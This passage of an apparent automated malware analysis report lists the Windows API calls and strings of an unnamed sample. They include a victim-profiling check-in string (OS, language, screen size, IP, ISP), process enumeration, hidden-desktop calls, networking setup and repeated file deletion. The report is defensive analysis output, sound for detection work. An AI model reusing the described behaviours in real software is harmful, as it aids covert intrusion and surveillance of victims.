      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
    • ExitProcess.KERNEL32(00001B81), ref: 0041169B
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 00412677
      • Part of subcall function 00412660: RtlAllocateHeap.NTDLL(?,?,7E418F9C), ref: 0041267A
      • Part of subcall function 00412660: memset.NTDLL(?,00000000), ref: 0041268E
      • Part of subcall function 00412660: ExitProcess.KERNEL32(00001B8B), ref: 004126B6
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 004126E9
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 004126EC
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412715
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412737
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412759
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 0041276A
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 00412771
      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    APIs
    • LocalAlloc.KERNEL32(00000040), ref: 00412C29
    • LocalFree.KERNEL32 ref: 00412C46
    • LocalFree.KERNEL32 ref: 00412C4B
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
    APIs
    • LocalAlloc.KERNEL32(00000040,00000028), ref: 00412D6A
    • LocalFree.KERNEL32 ref: 00412DAB
    • LocalFree.KERNEL32 ref: 00412DB0
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040), ref: 00412C29
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C46
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C4B
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
      • Part of subcall function 00412F60: LocalAlloc.KERNEL32(00000040,00000010), ref: 00412F67
    APIs
    • _vsnprintf.NTDLL(ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV,000003FF,?,?,?,7E418F9C,00412995,?,00000000,00000000,00000000,00000003,000018E1,?,83868CF7), ref: 00410E3A
    Strings
    • ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV, xrefs: 00410E37
    APIs
      • Part of subcall function 00414CB0: _alldiv.NTDLL ref: 00414CC6
    • memset.NTDLL(?,0000003D), ref: 00414EBD
    APIs
    • strstr.NTDLL ref: 00410B77
    • memcpy.NTDLL(00000507,?,?,?,?,0000001C,?,178.18.17.204,?), ref: 00410B8A
    APIs
    • LocalAlloc.KERNEL32(00000040,00000058), ref: 004175E3
    • LocalAlloc.KERNEL32(00000040,00000048), ref: 0041762F
    APIs
    • LocalFree.KERNEL32 ref: 00412B8D
    • LocalFree.KERNEL32 ref: 00412B92
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040), ref: 00412C29
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C46
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C4B
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
    APIs
    • SetThreadDesktop.USER32(?), ref: 00412AB9
    • GetModuleHandleW.KERNEL32(00000000), ref: 00412AC1
      • Part of subcall function 00412780: GetModuleHandleW.KERNEL32(00000000), ref: 00412797
      • Part of subcall function 00412780: strncpy.NTDLL(?,?), ref: 004127C7
      • Part of subcall function 00412780: lstrlen.KERNEL32(?), ref: 004127D4
      • Part of subcall function 00412780: CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 004127F2
      • Part of subcall function 00412780: ExitProcess.KERNEL32(00000661), ref: 0041281D
      • Part of subcall function 00412780: WSAStartup.WS2_32(00000202,?), ref: 00412830
      • Part of subcall function 00412780: RtlGetLastWin32Error.NTDLL ref: 00412839
      • Part of subcall function 00412780: ExitProcess.KERNEL32(00000663), ref: 00412887
      • Part of subcall function 00412780: SetTimer.USER32(00000000,00000000,0000000A,00413B80), ref: 004128B2
      • Part of subcall function 00412780: RtlGetLastWin32Error.NTDLL ref: 004128C2
      • Part of subcall function 00412780: ExitProcess.KERNEL32(00000001), ref: 004128D7
      • Part of subcall function 00412780: memset.NTDLL(?,00000000), ref: 004128FD
      • Part of subcall function 00412780: GetVersionExW.KERNEL32(?), ref: 00412912
      • Part of subcall function 00412780: GetSystemDefaultLangID.KERNEL32(?,?,00000001), ref: 00412933
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000000), ref: 00412944
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000001), ref: 0041294A
      • Part of subcall function 00412780: RtlGetLastWin32Error.NTDLL ref: 0041299C
      • Part of subcall function 00412780: GetModuleHandleW.KERNEL32(00000000), ref: 004129B8
      • Part of subcall function 00412780: LocalAlloc.KERNEL32(00000040,000000D4), ref: 004129DA
      • Part of subcall function 00412780: LocalAlloc.KERNEL32(00000040,00000008), ref: 004129F9
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000000), ref: 00412A0C
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000001), ref: 00412A12
      • Part of subcall function 00412780: UnregisterClassW.USER32(59FFB769-5787-4181-A4F0-949BF67A7793,00400000), ref: 00412A82
      • Part of subcall function 00412780: OleUninitialize.OLE32 ref: 00412A88
    APIs
    • GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?), ref: 0041893A
    APIs
    • LocalAlloc.KERNEL32(00000040,00000010), ref: 00412F67
    APIs
    • CoTaskMemAlloc.OLE32(0000004A), ref: 004168FD
    APIs
    • GetWindowRect.USER32(?,?), ref: 00416615
    APIs
    • RtlUnwind.NTDLL(004186D9,0041878C,00000000,00000000,?,?,?,?,?,004186D9), ref: 00418787
    APIs
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411277
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 004112AA
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 004112E3
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 0041131C
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411355
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 0041138E
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 004113C7
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411400
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411439
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411472
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411494
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041149D
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114BF
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114C8
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114EA
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114F3
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411515
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041151E
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411540
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411549
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041156B
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411574
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411596
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041159F
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115C1
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115CA
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115E6
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115EC
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411605
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041160B
    • LocalFree.KERNEL32 ref: 00412590